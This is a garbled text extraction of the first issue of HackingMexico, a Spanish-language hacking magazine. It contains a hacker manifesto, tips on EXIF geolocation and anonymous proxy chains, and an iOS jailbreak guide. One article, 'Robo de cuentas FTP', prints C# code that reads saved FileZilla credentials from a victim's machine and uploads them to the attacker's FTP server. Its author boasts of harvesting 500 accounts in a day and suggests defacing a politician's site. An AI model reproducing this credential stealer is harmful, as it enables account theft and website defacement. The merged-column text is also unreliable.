Documenti di Didattica
Documenti di Professioni
Documenti di Cultura
informes 55 10 68 88 09
info@hackingmexico.mx
editorial
Editorial
Bienvenidos a esta primera
publicacion de HackingMexico la
revista mexicana de seguridad
informatica y hacking. Este ejemplar
que tienes en tus manos es el
resultado de un gran esfuerzo por
parte de todo el equipo.
HackingMexico nace con el
objetivo de concientizar y educar
sobre los riesgos actuales de la
seguridad, desde un punto de vista
practico y ofensivo que nos permitira
adentrarnos a la manera de pensar del
atacante.
El material esta enfocado para cualquier
persona que desee adentrarse o pulir sus
conocimientos sobre hacking.
Nuestra mision es fomentar el conocimiento,
recolectar informacion es el primer paso a la
sabiduria, pero compartirla es el primer paso para
construir una comunidad, es por eso que te brindamos un
host gratuito para que publiques tu blog y compartas tus
investigaciones con la comunidad.
Recuerda que todos los enlaces a las descargas del software
que se mencione en la pagina estará listado en el portal oficial
www.hackingmexico.mx, dentro de la sección de revistas.
Esperemos disfrutes este primer ejemplar, tanto como nosotros
haciéndolo.
El Equipo HackingMexico
M.C Raul Robles A. CEO
Agradecimientos a gente
que colaboro en este numero
• M4ku4Z • CorruptedByte
• Axxus • Death/ Scarlett Toquero
• Profesor X (idea lateral-Despacho Editorial)
• Zeus • Megabyte
• Tognu • Helios Mier
• Molder Sombrero de Paja Y el apoyo recibido por los alumnos
• Dr h47 de El Instituto Tecnologico de
• Annika Tuxtepec y la FES Aragon
No nos hacemos responsables por el mal uso de la informa- aprender como defenderse desde un punto de vista ofensivo.
cion aqui expuesta, todo el material es con fines educativos Hackingmexico esta en contra de grupos de choque y ac-
y de investigacion, hackingmexico no incita a ningun tipo tivismo como “Anonymous”, nosotros somos un grupo de
de vandalismo virtual, cyberbullying, ni cyberamenzas. profesionales expertos en seguridad informatica que no
La informacion es para conocimiento de todos, para poder apoyan este tipo de actividades delictivas.
2 www.hackingmexico.mx
haxorpedia
Haxorpedia
esteganografia leet
Tecnicas de ocultamiento de código dentro Termino usado para describir a la elite
de archivos, usualmente de imagen de los hackers, tambien es referido
como l33t
hacktivismo
Movimiento hacker con ideales políticos 0day
o de carácter social Vulnerbilidad en un sistema que no ha
sido del dominio publico, que lleva 0
Cracking
Metodos para saltear protecciones en software
XSS
Cross Site Scripting, tecnica que permite
como por ejemplo los Trial de 30 dias.
el robo de cookies.
www.hackingmexico.mx 3
CONTENTS PAGE
06
El navegación anonima
manifiesto ocultando nuestras
hacker huellas en internet
10 16
Hackintosh jailbreak en
dispositivos IOS
24
robo de identidad
mediante crimeware
30
4 www.hackingmexico.mx
vulnerabilidad
facebook: explotando mikrotik httpproxy
callando al
al ser humano chismoso
12 14
hacking
microsoft
c#
22
Robo de
cuentas
FTP
26
riesgos de
seguridad old school
en IPV Cyruxnet
6 40
www.hackingmexico.mx 5
a quién le es llamado un hacker
contents page
Aquiénle es llamado un
Hack
^POr
Jesús Antonio
Alvarez Cedillo
Tognu
IPN-CIDETEC
6 www.hackingmexico.mx
er
www.hackingmexico.mx
7
a quien le es llamado un hacker
a quién le es llado un hacker
A principios de la decada de
1980, influenciados por
Hacker:una persona
Hack
la difusion de la pelicula
Juegos de Guerra, y el am-
obsesionada por
pliamente publicado arresto de una “ban-
da de hackers” conocida como la 414, los
conocer lo mas
hackers pasaron a ser considerados como
chicos jovenes capaces de violar sistemas
posible sobre
informaticos de grandes empresas y del
gobierno. Desgraciadamente, los medios
los sistemas
de informacion y la comunidad cientifica
social no ha puesto mucho esfuerzo por
informaticos.
variar esta definicion. El problema para
llegar a una definicion mas precisa radi-
ca, tanto en la poca informacion que hay
sobre sus actividades diarias, como en el
hechos que Parker califica como de hac-
hecho de que lo que se conoce de ellos
ker. Bequai confunde aun mas el termi-
no siempre cabe bajo las etiquetas de los
no al definir al hacker como alguien que
delitos conocidos.
utiliza ilegalmente las tarjetas de credito
Parker reconoce que el hacking no
telefonico para acceder a sistemas que
abarca todo el rango de actividades aso-
distribuyen software comercial ilegal-
ciadas a la violacion de los sistemas in-
mente. Veremos que esto tiene poco que
formaticos, pero lo prefiere al termino
ver con las actuaciones propias de los ha- “hacker” se reser-
“phreaking”, que considera muy oscuro.
ckers, pero es ilustrativa de otros tipos de va generalmente a
Por otra parte, Bequai no rechaza el ter-
actividades informaticas inusuales. aquellos que se dedi-
mino “phreaking” y a menudo lo aplica a
Los terminos, “hacker”, “phreaker” can al segundo tipo.
y “pirata” se presentan y definen En otras palabras, un ha-
tal y como los entienden aque- cker es una persona que tiene el
llos que se identifican con estos conocimiento, habilidad y deseo de
METODOLOGIA PARA papeles.En primer lugar, el area explorar completamente un sistema infor-
8 www.hackingmexico.mx
a quien le es llado un hacker
Un Hacker
ker
tiene sus
reglas aunque
estas sean
muy sencillas,
estas son:
TAXONOMIA HACKER
La clasificación general de las activi-
I Nunca destroces nada intencionalmente
en la Computadora que estés crackeando.
VI
del submundo informatico, esta es sim-
Nunca hackees en computadoras
plemente una herramienta para poder rea-
¿QUE SE NESECITA del gobierno. El gobierno puede
lizar llamadas de larga distancia sin tener
PARA SER UN HACKER? permitirse gastar fondos en buscarte mien-
que pagar enormes facturas. La cantidad
¿Los hackers necesitan caros equipos tras que las universidades y las empresas
de personas que se consideran phreakers,
informáticos y una estantería rellena de particulares no.
contrariamente a lo que sucede con los hac-
manuales técnicos?. La respuesta es NO!
VII
kers, es relativamente pequeña. Pero aque-
,Hackear puede ser sorprendentemen- No uses BlueBox a menos que
llos que si se consideran phreakers lo hacen
te fácil, mejor todavía, si se sabe cómo no tengas un servicio local o
para explorar el sistema telefonico.
explorar el World Wide Web, se puede un 0610 al que conectarte. Si se abusa de la
La mayoria de la gente, aunque usa
encontrar casi cualquier información re- bluebox, puedes ser cazado.
el telefono, sabe muy poco acerca de él.
lacionada totalmente gratis. De hecho,
VIII
Los phreakers, por otra parte, quieren
hackear es tan fácil que si se tiene un ser- No dejes en ningún BBS mu-
aprender mucho sobre el. Este deseo de
vicio on-line y se sabe cómo enviar y leer cha información del sistema
conocimiento lo resume asi un phreaker
un e-mail, se puede comenzar a hackear que estas crackeando. Di sencillamente “estoy
activo: “El sistema telefonico es la cosa
inmediatamente. LA TECNICA llamada trabajando en un UNIX o en un COSMOS....”
mas interesante y fascinante que conoz-
GOOGLE HACKING (figura 4) es una pero no digas a quien pertenece ni el teléfono.
co. Hay tantas cosas que aprender. Inclu-
herramienta simple y sencilla donde solo
IX
so los phreakers tienen diferentes areas
se necesita un navegador de Internet y el No te preocupes en preguntar, na-
de conocimiento.
servicio de busqueda GOOGLE. die te contestara, piensa que por
El emblema hacker, un proyecto para
responderte a una pregunta, pueden cazarte
crear un símbolo reconocible para la per-
a ti, al que te contesta o a ambos.
cepción de la cultura hacker. General-
X
mente este simbolo vienen de el juego
Punto final. ce hackeando, no sabrás
Google Hacking.
www.hackingmexico.mx 9
el manifiesto hacker
mani
Uno más ha sido capturado hoy, Hoy hice un descubrimiento.
Está en todos los periódicos. Encontré una computadora.
“Adolescente arrestado por delito informático” Espera un momento, esto es lo máximo. Esto hace lo que yo le
“Hacker arrestado por irrumpir en un sistema bancario”. pida. Si comete un error es porque yo me equivoqué.
No porque no le gusto . . .
//-Malditos muchachos. Son todos iguales.// O se siente amenazada por mi . . .
¿Pero pueden, con su psicología barata y su cerebro de los años O piensa que soy un engreído . . .
cincuenta, siquiera echar un vistazo a lo que hay detrás de los O no le gusta enseñar y no debería estar aquí . . .
ojos de un hacker? ¿Se han parado alguna vez a pensar qué es lo //-Maldito muchacho. Todo lo que hace es jugar. Todos son iguales.//
que le hace comportarse así, qué le ha convertido en lo que es?
Soy un Hacker, entra a mi mundo . . . Y entonces ocurrió . . .
El mío es un mundo que comienza en la escuela . . . una puerta abierta al mundo . . .
Soy más inteligente que la mayoría de los otros muchachos, esa Corriendo a través de las líneas telefónicas como la heroína a
basura que ellos nos enseñan me aburre . . . través de las venas de un adicto, un pulso electrónico es enviado,
//-Malditos subrealizados. Son todos iguales.// un refugio para las incompetencias del día a día es buscado . . .
una tabla de salvación es encontrada.
Estoy en la preparatoria. “Este es . . . este es el lugar a donde pertenezco . . .”
He escuchado a los profesores explicar por decimoquinta vez Los conozco a todos aquí . . .
como reducir una fracción. aunque nunca los hubiera visto, o hablado con ellos, o nunca vuelva
Yo lo entiendo. a escuchar de ellos otra vez . . Los conozco a todos . . .
“-No, Srta. Smith, no le voy a mostrar mi trabajo, //-Malditos muchachos. Enlazando las líneas telefónicas otra vez.
lo hice en mi mente . . .” Todos son iguales . . .//
//-Maldito muchacho. Probablemente se lo copió. Todos son iguales.// Apuesta lo que quieras a que todos somos iguales . . .
10 www.hackingmexico.mx
lE
el manifiesto hacker
fiesto Hacker
Nos han estado dando comida para bebés con cuchara en la es-
cuela, cuando estábamos hambrientos de carne . . . asesinan, engañan y nos mienten
Las migajas de carne que ustedes dejaron escapar estaban masti- y tratan de hacernos creer que es por nuestro bien,
cadas y sin sabor. ahora nosotros somos los criminales.
Hemos sido dominados por los sádicos, o ignorados por los apáticos. Si, soy un criminal.
Los pocos que tenían algo que enseñarnos encontraron en noso- Mi crimen es la curiosidad.
tros alumnos atentos, pero esos pocos son como gotas de agua en Mi crimen es el juzgar a las personas por lo que dicen y piensan,
el desierto. no por como se ven.
Mi crimen es ser mucho más inteligente que ustedes, algo por lo
Este es nuestro mundo ahora . . . cual jamás podrán perdonarme.
El mundo del electrón y el switch, la belleza del baudio.
Hacemos uso de un servicio que ya existe sin pagar, por que po- Soy un Hacker, y este es mi manifiesto.
dría ser ridículamente barato, si no estuviera en manos de gloto-
nes hambrientos de ganancias, y ustedes nos llaman criminales. Pueden detener a este individuo, pero no podrán detenernos a
Nosotros exploramos . . . todos… después de todo, todos somos iguales.
y ustedes nos llaman criminales.
Nosotros buscamos detrás del conocimiento . . .
y ustedes nos llaman criminales.
Nosotros existimos sin color, sin nacionalidad, sin prejuicios re-
TheMentor
ligiosos . . . y ustedes nos llaman criminales.
Ustedes construyen bombas atómicas,
ustedes hacen la guerra,
www.hackingmexico.mx 11
vanidad mi pecado favorito
vanidad
Mi pecado
favorito Fenomeno social
Independientemente de si eres religioso, todos hemos caido en uno u otro de los
pecados capitales, los que hayan visto la pelicula de El abogado del diablo recordaran
una frase peculiar.
Y esto es precisamente lo que explotan las redes sociales. Muchos de nosotros por
ahi del 2000 nos preocupabamos por que alguien tuviera el control de nuestras vidas y
nuestros movimientos, nos preocupabamos por la privacidad, se nos hacia factible que el
gobierno implantara chips en nuestro cuerpo para poder rastrearnos via GPS, seria el final de
nuestra privacidad ¿cierto?
Explotando la vanidad
Pues no se necesito de un gobierno imperialista que llevara a cabo esas acciones de control, nosotros
mismos sin que nadie nos obligue hacemos “check in” en facebook, o taggeamos a la gente con la que
estamos, dejamos un mapa de nuestras vidas plasmado en el mundo virtual, esta informacion es visible en
su mayoria, cualquier stalker podria saber a que lugares vas, con quien vas, con que frecuencia, y nosotros
mismos facilitamos esto simplemente por vanidad.
Queremos que nos vean hacer check in en el antro de moda, algun concierto, o tal vez que vean que diario
vas a comer a lugares elegantes, o que te la pasas de vacaciones en Europa.
Por ejemplo un criminal podría utilizar esta información para saber que no estas en casa, que te fuiste a un
concierto y que regresaras en muchas horas.
Las vidas de todos en las redes sociales se ven tan maravillosas, todos tienen muchos amigos, y van a salir a fies-
tas, y se la pasan super increible no? Todo mundo quiere mostrar que su vida es extrema, y llena de aventuras.
Una vez mas el intelecto humano ha sido explotado, no se necesito de un big brother para monitorear a la raza huma-
na, han explotado nuestra VANIDAD.
Facebook : Expl
12 www.hackingmexico.mx
POr
M.C Raul Robles A
Megabyte al serhu
vanidad mi pecado favorito
EXIF Exchangeable
image file format
Definicion de Wikipedia:
Las etiquetas (tags) de metadatos definidas en el estándar Exif cubren un amplio espectro
incluido:
Información de fecha y hora. Las cámaras digitales registran la fecha y la hora actual y la
almacenan en los metadatos.
Configuración de la cámara. Esta incluye información estática como el modelo de cámara y el
fabricante, e información que varia con cada imagen como la orientación, apertura, velocidad del
obturador, distancia focal, medidor de exposición y la velocidad de la película.
Información sobre localización, la cual podría provenir de un GPS conectado a la cámara. Hasta el
2004 solo una pocas cámaras lo soportaban
Geolocalizacion
Cada foto que tomas con tu Smartphone, por lo regular trae geolocalizacion activada. Estos datos se guardan
en forma de metadatos, embedidos en cada foto, que pueden ser extraidos fácilmente, y nos revelan una cantidad
enorme de datos, incluyendo tu localización exacta con coordenadas GPS
A travez de una sencilla aplicación, podemos extraer las coordenadas GPS de la foto, y hacer uso de las API de
google maps, lo cual resulta en un punto en el mapa donde la foto fue tomada.
Existen varias herramientas para extraer estos datos, tales como creep.py un programa hecho en phyton que nos da una
interfaz grafica para geolocalizar usuarios a travez de twitter. Tambien puedes probarlo sin bajar ningún tipo de software
mediante la pagina exifdata.com
Conclusion
Para evitar que tu privacidad sea violada, desactiva la geolocalizacion de tu Smartphone, aunque algunos servicios como twitter ya
borran los metadatos de las fotos, hay muchos otros que siguen sin hacerlo.
otando
mano www.hackingmexico.mx 13
vulnerabilidad
Vulnerabili
C uando navegamos en la nube
y queremos mantener nuestro
anonimato es común recurrir
al uso de PROXYS que no son mas que otra
computadora que con ayuda de un software
sirve de intermediara en la comunicación
presentándose como nosotros.
La cabecera HTTP que mas nos causaría problemas de las antes HTTP /1.1 200 OK
mencionadas es X-Forwarded-For ya que en ella se almacenan las DATE:WEB,30 HAR 2011 17:17:41 GHT
direcciones IP que han tenido lugar en la comunicación y por lo Server:Apache/2.214(Unix) PHP /5.3.2
tanto nuestra IP original. Transfer-Encoding:chunked
Content-Type:message/http
¿A que problema nos enfrentamos? 92
Es común la escaeces de proxys anónimos de uso publico por lo Trace/HTTP/1.1
tanto solo sobran los proxys transparentes que exponen nuestra Host:www.metroflog.com
identidad. Veamos aquí un ejemplo de petición HTTP con un pro- X-Proxy-ID:2863273154
xy transparente: X-Forwarded-For:201
V1a:1.1 192.168.10.1 (Mikrotik HttpProxy)
14 www.hackingmexico.mx
dad
vulnerabilidad
Por Molder Sombrero de Paja
molder@aztlan-hack.org
Aztlan Hack / http://www.aztlan-hack.org
Mikrotik HttpProxy
Callando al Chismoso
X-Forwarded-For=\0→ X-Forwarded-For=\0,xxx.xxx.xxx.xxx→X-Forwarded-For=\0
www.hackingmexico.mx 15
navegación anónima
NAVEGACIÓN
ANÓNIMA
OCULTANDO
NUESTRAS HUELLAS
E N I N T E R N E T
D
Por Rodolfo H.Baz aKa Pr@fEsOr X
ese evento y sintió que no lo podían de- hacia los servicios que nos conectemos, en
tectar y pues no previo ciertas cosas y en este caso Internet, donde el usuario tiene
menos de 20 minutos ya había sido detec- una IP interna, la cual es asignada por el
tado y lo estaban ya sacando del evento…. protocolo DHCP, y que por default en la
xD, que recuerdos. Ahora si como dice el mayoría de los casos está estructurada en
esde los primeros días del año 1999, en dicho “el diablo sabe más por viejo que por el rango 192.168.1.XX donde las XX se-
que en esos años empezaran mis andanzas diablo” con esta moraleja quiero prevenir rian números asignados del 1 al 254, una
por internet y sus alrededores me vi en la a todos nuestros lectores y lo pondré entre vez asignada el router se conecta con el ISP
necesidad de ocultar mi identidad, esto con comillas que “tengan en la mente que nun- “Internet Service Provider” con el cual te-
el fin de hacer más complicado el rastrear- ca de los nunca ocultaremos nuestra IP al nemos contratado el servicio de Internet y
me, por obvias razones ;), en esta serie de 100%” y que siempre habrá forma de ras- este nos asigna una IP que en nuestro caso
artículos trataremos de explicar todas las trearte y localizarte. en servicios caseros sería una IP Dinámica
técnicas que son usadas para ocultar nues- Publica y con esta podremos navegar en
tra identidad ya sea en redes internas o ex- CONEXIÓNES POR internet además es la que nos identificará
ternas como lo es el ciberespacio, para que DEFAULT A INTERNET y quedará registrada en los logs de todos
no les vaya a pasar como a un amigo que Normalmente una conexión a internet los lugares que visitemos, esta IP es como
en un evento masivo quiso atacar con una la hacemos de nuestra computadora a un nuestra huella digital que queda plasmada
denegación de servicio a los servidores de router el cual sirve como puerta de enlace en todo lo que tocamos, ahí está el punto y
16 www.hackingmexico.mx
navegación anónima
el detalle como decía Cantinflas, el chiste
de todo esto es que la IP que nos asigna
nuestro ISP y que nos identifica, no quede
guardada en los servidores que visitamos,
ósea hay que camuflajearla con otra IP para
que la que quede almacenada no sea la de
nosotros si no la de otra PC así podremos
navegar con cierto grado de anonimato.
Los Proxy
TECNICAS DE
NAVEGACIÓN ANONIMA Ventajas Desventajas
USADAS EN LA ACTUALIDAD En general, los proxies hacen En general, el uso de un
Existen muchas técnicas de navegación posibles varias cosas nuevas: intermediario puede provocar:
anónima que pueden ser usadas ya sea in-
dividualmente o combinadas, que darán un Control. Sólo el intermediario Abuso. Al estar dispuesto a
cierto rango de anonimato, a mi punto de hace el trabajo real, por tanto se recibir peticiones de muchos
vista la mejor forma de ocultarnos es usar- pueden limitar y restringir los usuarios y responderlas, es
las en su forma combinada para incremen- derechos de los usuarios, y dar posible que haga algún trabajo
tar el rango de efectividad. permisos sólo al Proxy. que no toque. Por tanto, ha de
Entre las técnicas usadas hoy en día te- controlar quién tiene acceso y
nemos las siguientes: Ahorro. Por tanto, sólo uno quién no a sus servicios, cosa
• Proxy Server de los usuarios (el Proxy) ha que normalmente es muy difícil.
• Proxy Chain Server de estar equipado para hacer el
• Wingate trabajo real. Carga. Un Proxy ha de hacer
• Bouncer´s el trabajo de muchos usuarios.
• Mac Spoofing Velocidad. Si varios clientes
• Red Distribuida TOR van a pedir el mismo recurso, el Intromisión. Es un paso más
• VPN Tunelling Proxy puede hacer caché: guardar entre origen y destino, y algunos
• HTTP Header´s Spoofing la respuesta de una petición para usuarios pueden no querer pasar
• WGroup Spoofing darla directamente cuando otro por el Proxy. Y menos si hace de
• Técnicas de verificación de Identidad usuario la pida. Así no tiene que caché y guarda copias de los datos.
• Entre otras volver a contactar con el destino, y
acaba más rápido. Incoherencia. Si hace
PROXY SERVER de caché, es posible que se
La primera forma y la más sencilla de usar Filtrado. El Proxy puede equivoque y dé una respuesta
y es conectarnos a Internet por medio de negarse a responder algunas antigua cuando hay una más
un “servidor Proxy de Web” más conocido peticiones si detecta que están reciente en el recurso de destino.
como Proxy, estos nos permiten conectarnos prohibidas.
a otros equipos de una red de forma indirecta Irregularidad. El hecho de
a través de él, cuando un equipo de la red de- Modificación. Como que el Proxy represente a más de un
sea acceder a una información o recurso, es intermediario que es, un Proxy usuario da problemas en muchos
realmente el Proxy quien realiza la comuni- puede falsificar información, o escenarios, en concreto los que
cación y a continuación traslada el resultado modificarla siguiendo un algoritmo. presuponen una comunicación
al equipo inicial. En unos casos esto se hace directa entre 1 emisor y 1 receptor
así porque no es posible la comunicación di- Anonimato. Si todos los (como TCP/IP).
recta y en otros casos porque el Proxy añade usuarios se identifican como uno
una funcionalidad adicional, como puede ser sólo, es difícil que el recurso
la de mantener los resultados obtenidos (por accedido pueda diferenciarlos.
ej.: una página Web) en una cache que per- Pero esto puede ser malo, por
mita acelerar sucesivas consultas coinciden- ejemplo cuando hay que hacer
tes. Con esta denominación general de Proxy necesariamente la identificación.
se agrupan diversas técnicas.
www.hackingmexico.mx 17
navegación anónima
18 www.hackingmexico.mx
navegación anónima
Como pueden ver este tipo de
conexión necesita de más recursos,
y se asemeja mucho a lo que vemos
en las películas de gangter´s infor- PRINCIPIOS DE
máticos donde tratan de rastrear al OPERACIÓN
delincuente informático y se dan DE SOCKSCHAIN SERVER
cuenta que la conexión pasa por va- SocksChain transmite la llamada
rios países o cambio de localización, TCP del programa cliente (Fire-
aquí lógicamente se las muestro en fox) a través de una cadena de
su forma real y sin tanto efecto es- proxy servers, Sockschain solo
pecial de Hollywood pero realmente se conecta el primer proxy server
esta si es efectiva, el único problema de la cadena y el primer proxy
que le veo es que como se genera server a su vez manda la petición
una conexión con varios servidores de conexión al segundo y así hasta
tendríamos que tener proxy rápidos llegar al final de la cadena confi-
para poder llevar a cabo esta técnica, gurada, usando esta tipo de cone-
como les decía a mis alumnos de xión donde el primero llamada al
la certificación de hacking ético segundo y el segundo al tercero y
que doy, ---los delincuentes van el tercero al siguiente en la cadena,
un paso delante de nosotros y un el rastreo de la conexión inicial
experto en seguridad informática es muy compleja, esto no quiere
debe de pensar como ellos para así decir que sea imposible de rastrear
no quedarse atrás y poder aplicar ya que se podría seguir el orden
seguridad ofensiva en el momento inverso de la conexión analizando
oportuno, tomando en cuenta esto, los logs de los servers conectados,
yo lo que haría es instalar un proxy pero surge una pregunta ¿si alguno
server oculto en un cibercafé en una de los servidores de la cadena no
ciudad, otro en una universidad en guardo los logs? Pues hasta ahí
una ciudad diferente y así hacerlo en llego el rastreo ;), teóricamente
dos o tres lugares más donde se que este tipo de conexión provee un
la conexión es estable y rápida, con alto grado de anonimato, me atre-
eso garantizaría la conexión para vería a decir que el grado de ano-
atacar---. nimato sería de un 70% y podría
Pero muchos se preguntaran a aumentar el % si lo combinamos
estas alturas con que utilería po- con otras técnicas pero tengan en
dría hacer esto? Bueno pues muy cuenta que el largo de la cadena
fácil, existe una utilería llamada es inversamente proporcional a la
SocksChain que es un programa velocidad de conexión.
que permite trabajar con cualquier
servicio a través de una cadena de
Sockets o proxy server HTTP para
ocultar la IP real, este puede traba-
jar con TELNET, IRC etc.
www.hackingmexico.mx 19
navegación anónima
CONFIGURACIÓN
DEL SOCKSCHAIN
Ahora veremos un software
En la cual podemos ver
que también tiene lo suyo, este
diferentes iconos, ahora damos
sirve para hacer manualmente
clic en el icono que tiene
un Proxychain, o sea un
como dos calcetines
encadenamiento de varios Proxy`s
colgados y aparece
para así tener relativamente un
la siguiente ventana
buen anonimato en la red.
la cual nos muestra
Como dice mi hijo
una lista de servidores
“papa menos platica y
Proxy a los cuales nos
mas acción” hehehe, ok la
podríamos conectar, una vez
versión que instalaremos será
ahí le damos click en UPDATE
SOCKSCHAIN v 3.11.151
LIST la cual bajara la nueva lista
mucha gente dice que este
de servidores Proxy que están
software ya no funciona y
disponibles para su uso le damos
realmente en el sentido estricto
clic y esperamos que actualice,
tienen razón ya que la lista de
una vez realizada, le damos clic
Proxy`s servers que trae por
en el botón llamado TEST ALL
default está obsoleta, pero
esto para que pruebe si los Proxy
aquí no usaremos esa lista si
servers están disponibles para su
no que vamos a crear nuestra
uso y conectados.
propia lista de servidores que
obtendremos de la pagina
mencionada en el apartado
CONFIGURACION DE
UTILERIAS.
Primeramente instalaremos
el sockschain como todo en
windows siguiente .. siguiente…
hasta finalizar la instalación, un
vez ahí abrimos el programa y nos
aparecerá la siguiente ventana:
20 www.hackingmexico.mx
navegación anónima
Una vez actualizada y Ahora configuremos nues-
testeados todos los Proxy ser- tra cadena de servidor Proxy a
vers aparecerá algo como en la los cuales nos conectáremos para
siguiente ventana: (imagen) ocultar Nuestra IP, para eso damos
clic en la ventana principal del progra-
ma en el signo de + de color verde, don-
de saldrá la siguiente ventana:
Saludos.
www.hackingmexico.mx 21
Mi
hacking microsoft c#
Hacking
cro
soft
22 www.hackingmexico.mx
E
hacking microsoft c#
por Mario Alberto Gonzales aka Axxus
tC#
UserName:{2},Password:{3}”, site.Name, directory.Path,directory.
UserName,directory.Password);
}
}
}
Console.ReadLine();
www.hackingmexico.mx 23
Hack
hackintosh
jailbreak en d
S aludos amigos mios, soy
M4ku4Z^^ y es un placer
formar parte de este proyec-
to tan interesante al cual fui
aceptado por el buen Megabyte, algunos ya
me conocen otros no tanto , espero poder
contribuir con este proyecto y al igual si
En mis palabras, seria como sacar
todo el provecho máximo de los disposi-
tivos que Apple nos vende.
Hasta la Fecha he logrado hacer jail-
tienen dudas ya saben como contactarme . break a ipods touchs, iphones, ipads y
Vamos a analizar el jailbreak a disposi- Apple tv 2G.
tivos iOS de Apple , revisar por que si o por No es ilegal hacer el jailbreak a nin-
que no debemos hacer el jailbreak, también gún dispositivo , pero lo que es ilegal
averiguaremos si nuestros dispositivos son es instalar aplicaciones de la APP STO-
candidatos o aptos para hacerlo. RE crackeadas, eso lo conseguimos con
Actualmente se pueden hacer jail- “APPSYNC” (pronto veremos su funcio-
break a los siguientes dispositivos de namiento).
Apple como los con : He de comentarles que el proceso de
-Ipod touch de 1 generación jailbreak es diferente según el IOS (ver-
-Ipod touch de 2 generación sión de software instalado en el idevice)
-Ipod touch de 3 generación .El firmware mas acual es el IOS 5.1 , yo
-Ipod touch de 4generacion aun no lo he instalado en ninguno de mis
-Iphone classic (1 generación) dispositivos , pero mas adelante, en el
-Iphone de3 Generación siguiente tutorial haremos una pequeña
-Iphone de 4 Generación reseña de que es lo nuevo en ese IOS.
-Ipad de 1 generación Al Hacer Jailbreak al dispositivo obte-
-Apple tv de 2 generación. nemos bastantes mejoras en el desempeño
del idevice , un ejemplo y el
Definición de Jailbreak
mas aclamado lo vemos en
el iphone de cualquier gene-
ración la cual es la liberación
Tomado de Wikipedia del carrier o de las bandas , esto nos quiere
Jailbreak: (en español, escaparse de la decir que podemos usar el iphone con la
cárcel o, más literalmente, rompecárcel), operadora que mas nos convenga , ya sea
un proceso que permite a los usuarios de por precio , cobertura , por preferencia , o
los dispositivos iPhone, iPod Touch, iPad simplemente por decidir tener el iphone li-
y Apple TV de todas las generaciones eje- bre . Aquí hay dos cosas muy importantes:
cutar aplicaciones distintas a las alojadas Al hacer jailbreak, no significa que tendre-
en App Store, el sitio oficial de descarga mos liberado el teléfono, eso es otro proce-
de programas para estos dispositivos. so que veremos mucho mas adelante.
24 www.hackingmexico.mx
intosh
hackintosh
ispositivos IOS
Por Juan Angel Osorio M4ku4z
M4ku4Z^^
m4ku4z@m4ku4z.net
www.m4ku4z.net
jailbreak, no
JAILBREAK hay un jailbreak en general para todos los
Al Hacer el jailbreak obtendremos beneficios productos Apple , esto varia según :
que no podemos tener con un dispositivo por -Generación del Dispositivo
liberado el
lista no termina ahí, son demasiados los que no modificamos el hardware , pero
que podemos obtener, los cuales iremos si modificamos el software, un ejemplo
aprendiendo a instalar y usar . muy claro seria , supongamos que mi
proceso que
esos beneficios? que me hagan valida la garantía (obvio
La respuesta es muy simple, tenemos tuve que haber descartado previamente ,
que realizar el jailbreak al sistema IOS ajustes de servicios 3G o que alguna apli-
adelante.
portante leer y saber que vamos a hacer limpio se borra todo y procedemos a re-
exactamente. clamar la garantía.
DESPÉDIDA
Bueno amigos , hemos llegado a la recta final de esta sección , donde aprendimos a co-
nocer todo el potencial que podríamos tener si hacemos jailbreak a nuestros dispositivos
, además de conocer algunas preguntas que se hacen muchos cuando van empezando en
esto del jailbreak . Por mi parte es todo , sin antes agradecer su atención y nos vemos
pronto en otro capitulo más.
www.hackingmexico.mx 25
robo de cuentas FTP
Robo de
¿Qué es FTP?
de peña nieto por ejemplo, pues entras, le desarrolladores web y como explotar
borras la pagina y subes una tuya nomas esas vulnerabilidades programando un
FTP o como en ingles se dice File Trans- para darle en la madre.| script, el día que libere el script con di-
fer Protocol, ‘Protocolo de Transferencia ferentes métodos de spreading obtuve
Robo de
de Archivos’ es un protocolo de red para 500 cuentas FTP en un solo día ya que
la transferencia de archivos entre siste- muchos freelancers usan este cliente
cuentas FTP
mas conectados a una red basado en la para administrar las diferentes páginas
arquitectura cliente-servidor. Es muy web de sus clientes, entonces una sola
sencillo de entender, del lado del cliente Hay muchas maneras de robar cuen- persona puede tener hasta 30 cuentas
(Tu, tu computadora) manda una peti- tas FTP como infección por troyanos, FTP guardadas de sus clientes.
26 www.hackingmexico.mx
cuentas
Como pueden ver esta guardado en texto plano sin ningún tipo de encriptación a simple
vista puedes ver como tienes los sub nodos con las credenciales FTP (Host, Port, User,
Pass), esto es una gran vulnerabilidad ya que como lo mencione es de los clientes FTP
más usado por los desarrolladores web que manejan diferentes servidores, este archivo
se encuentra en la siguiente ruta:
“C:\Users\CorruptedByte\AppData\Roaming\FileZilla\recentservers.xml”
www.hackingmexico.mx 27
robo de cuentas FTP
28 www.hackingmexico.mx
robo de cuentas FTP
Es un método muy simple (claro para los que sabemos pro-
gramar, si no sabes pues hay esta nuestro señor Google), a
simple vista se ve que lo único que hace este método es crear
un objeto XML para trabajar con el asi como se le da la ruta de
manera automática con esta línea:
Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData).ToString() +
“\\FileZilla\\recentservers.xml”;
.NET nos facilita la ruta y así nos quitamos el problema que nos
topamos con que el fichero XML este dentro de una carpeta den-
tro de otra carpeta con el nombre de usuario de la maquina que
obviamente desconocemos. Después se procesa todo el XML y
se saca el valor de cada nodo que tiene las credenciales FTP, una
vez haciendo esto solo se guarda en un archivo de texto, pero ob-
viamente con esto nosotros no tendríamos las credenciales FTP
solo se almacenarían en un archivo de texto de la víctima, para
eso ahora programaremos un método para enviar las contraseñas
por medio de FTP a nuestro servidor, de la siguiente manera:
public void Send(string sHost, string sDir, string sUser, string sPass, string sFile)
{
string ftpHostDirFile = “ftp://” + sHost +sDir +sFile;
FtpWebRequest ftp = (FtpWebRequest)FtpWebRequest.
Create(ftpHostDirFile);
ftp.Credentials = new NetworkCredential(sUser, sPass);
ftp.KeepAlive = true;
ftp.UseBinary = true;
ftp.Method = WebRequestMethods.Ftp.UploadFile;
FileStream fs = File.OpenRead(sFile);
byte[] buffer = new byte[fs.Length];
fs.Read(buffer, 0, buffer.Length);
fs.Close();
Stream ftpstream = ftp.GetRequestStream();
ftpstream.Write(buffer, 0, buffer.Length);
ftpstream.Close();
}
www.hackingmexico.mx 29
robo de identidad mediante crimeware
Robo
de
Identidad
mediante
Crimeware Por: Arturo Zamora
@zeux0r
zeux0r@insecure.org.mx
30 www.hackingmexico.mx
robo de identidad mediante crimeware
Introducción
El robo de identidad mediante el crimeware, actualmente es uno de los nego-
cios mas lucrativos para los delincuentes informáticos, en la actualidad obtienen
ganancias muy importantes, pero ¿Porqué es esto tan lucrativo?
Bueno como sabemos para los delincuentes informáticos este tipo de actividades
requieren de una inversión mínima y máximas ganancias, estamos hablando de in-
